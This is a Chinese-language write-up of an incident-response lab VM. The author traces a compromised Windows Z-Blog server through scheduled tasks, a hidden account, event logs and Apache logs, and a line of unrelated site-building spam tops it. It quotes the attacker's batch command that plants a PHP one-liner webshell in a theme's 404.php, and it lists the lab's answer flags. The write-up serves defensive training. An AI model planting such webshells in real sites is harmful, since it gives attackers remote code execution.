电商行业网站建设及维护论坛推广工具

电商行业网站建设及维护,论坛推广工具,郑州做网站电话,好用的免费建站网站今天继续给大家带来知攻善防Web-3靶机详细教程#xff0c;其实基础的Windows应急响应的思路都是大差不差的#xff1b;常见的几个点就是计划任务“”开机启动项“”后台进程“”隐藏用户“等#xff1b; 本靶机与Web-1的步骤都是差不多的#xff1b;目的就是为了巩固…今天继续给大家带来知攻善防Web-3靶机详细教程其实基础的Windows应急响应的思路都是大差不差的常见的几个点就是计划任务“”开机启动项“”后台进程“”隐藏用户“等本靶机与Web-1的步骤都是差不多的目的就是为了巩固相应的知识文章目录靶机环境前景需要应急溯源过程1任务计划2隐藏用户排查3日志文件4Web应用程序日志5进程排查Web服务排查通过 Z-Blog 官方提供的重置工具解题总结靶机环境今天继续给大家带来知攻善防Web-3靶机详细教程其实基础的Windows应急响应的思路都是大差不差的常见的几个点就是计划任务“”开机启动项“”后台进程“”隐藏用户“等前景需要小苕在省护值守中在灵机一动情况下把设备停掉了甲方问为什么要停设备小苕说我第六感告诉我这机器可能被黑了。这是他的服务器请你找出以下内容作为通关条件攻击者的两个IP地址隐藏用户名称黑客遗留下的flag【3个】本虚拟机的考点不在隐藏用户以及ip地址仔细找找吧。关于靶机启动解压后双击.ovf文件使用Vmware打开直接导入即可。相关账户密码Windowsadministrator/xj123456话不多说直接开始本次的主机排查具体步骤可以先看看知攻善防蓝队靶机Web-1溯源过程应急溯源过程首先我们进入主机发现是台Windows Server 2012服务器这里我们还是先查找常见的几个排查点计划任务程序开机启动项后台进程隐藏用户后台Webshell文件系统日志1任务计划单击【开始】【设置】【控制面板】【任务计划】查看计划任务属性首先打开这个我们就遇到了第一个flag运气比较好并且我们得知了攻击者创建到隐藏用户为hack6618$所以第一个flag为flag{zgsfsyssec}那么接下来我们要做的就是查看这个定时任务执行的后台文件是什么以及路径可以看到攻击者将文件处理为.bat的批处理文件方便执行具体文件路径为C:\Users\hack6618$\Downloads\system.batecho^?php eval($_POST[pass]);?^D:\phpstudy_pro\WWW\zb_users\theme\aymFreeFive\template\404.phpechoflag{888666abc}我们来到具体目录下发现文件主要目的就是在Web服务创建一个404.php文件作用创建一句话木马是为了蚁剑等工具进行连接同时也得到了第二个flagflag{888666abc}2隐藏用户排查接下来给大家几个常见隐藏用户排查的命令以及步骤可疑账号├── net user├── net user 用户名└──lusrmgr.msc本地用户和组当然还有一些简单的命令# 列出所有本地用户基础排查net user ——隐藏用户排查不出来# 获取用户详细信息含状态、描述、SIDwmic useraccount get Name,Status,Description,Disabled,SID最保险的方法是直接去注册表进行查看按 WinR 输 “【regedit】”导航至 【HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names】右侧列表即含所有用户含隐藏。3日志文件在Windows中在进行溯源的时候我们通常是查看“安全”“系统”“应用程序”这三个日志具体步骤WinR 打开运行输入 “【eventvwr.msc】”回车运行打开事件查看器搜索登陆失败的4645事件ID我们可以大概判断攻击者的攻击时间2024/3/11 20. ~ 22.左右随后我们搜索4720创建用户的事件ID发现创建了hack6618$隐藏用户4Web应用程序日志随后发现在服务器上还安装了phpstudy并且有Apache和MySQL等服务那接下来的步骤就很熟悉了直接分别查看他们的日志只在Apache上发现日志打开后经过排查发现192.168.75.129这个可疑IP在攻击前存在利用cmd.jsp文件进行爆破的行为如果我们想查看日志的具体内容可以用Linux来进行排查Apache和Linux日志分析使用命令进行排查# 统计IP地址awk{print$1}access.log|uniq-c|sort-n# 不够美观—— uniq -c 只合并连续的相同行awk{print$1}access.log|sort|uniq-c|sort-nr发现两个可疑IP地址想要详细查看具体某一个IP地址的信息# 查看具体IP的详细信息cataccess.log|grep192.168.75.130cataccess.log|grep192.168.75.129可以看到192.168.75.130这个IP一直在SYSTEM权限里尝试CSRF漏洞越权CSRF 漏洞是 “跨站请求伪造”指攻击者利用用户已登录的合法身份诱导用户在不知情时发送恶意请求执行非用户意愿的操作如改密、操作数据。并且在/zb_users/theme/aymFreeFive/template/上传了一个404.php脚本文件具体内容?php eval($_POST[pass]);?而这个文件就是我们在任务计划进行排查的时候system.bat文件进行的操作所以可疑IP192.168.75.129和 192.168.75.1305进程排查系统进程以及服务的排查就简单多了有以下方法任务管理器命令netstat -ano我们打开cmd然后输入命令来查找存在哪些可疑进程无任何可疑信息Web服务排查我们打开3306和Apache服务进入到网站里具体页面如下当前权限为游客还是老样子熟悉系统的同时对Web目录进行枚举得到结果如上随后我们分别进行访问没有任何信息只能去网上搜索漏洞Zblog不知道用户名密码网上搜索一些常见的弱口令进行爆破失败了只能上点手段了通过 Z-Blog 官方提供的重置工具前提条件你有FTP访问权限。使用通过FTP上传到Z-BlogPHP的根目录在浏览器中打开nologin.php使用过后此文件会自动删除。下载地址https://update.zblogcn.com/tools/nologin.zip操作步骤访问 Z-Blog 官方论坛。找到并点击“找回密码”或类似选项。下载 nologin.zip 文件。解压 nologin.zip 文件取出 nologin.php 文件。使用FTP将 nologin.php 文件上传到你的Z-Blog PHP网站根目录。在浏览器中访问 http://你的域名/nologin.php。进入 nologin.php 页面后点击“登录”按钮即可进入后台。进入后台后点击左侧导航栏的“用户管理”选项。选择管理员账户然后修改密码。随后访问http://192.168.44.169/nologin.php得到页面同时还发现了攻击者保存的hacker账号重置密码后我们登录到admin用户和Hacker用户查看攻击者存放了哪些后台文件随后在Hacker后台找到了flagflag{HCksec}解题至此我们找到了所有的flag和答案点击服务器桌面的解题.exe即可完成靶机挑战输入答案成功解决靶机C:\Users\Administrator\Desktop题解.exe 欢迎使用 知攻善防实验室 题解系统 确保你已获得以下信息 攻击者的两个IP地址 攻击者隐藏用户名称 三个攻击者留下的flag 你准备好了吗(y/n): y 请输入攻击者第一个ip地址:192.168.75.130 IP1地址正确 请输入攻击者第二个ip地址:192.168.75.129 IP2地址正确 请输入攻击者隐藏用户名:hack6618$ 用户名正确 请输入第一个flag:flag{zgsfsyssec}flag1正确 请输入第二个flag:flag{888666abc}flag2正确 请输入第三个flag:flag{HCksec}flag3正确 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 恭喜你你成功解出了该靶机 C:\Users\Administrator\Desktop总结没什么好说的多动手自己上手永远比眼睛看学的更多期待下次再见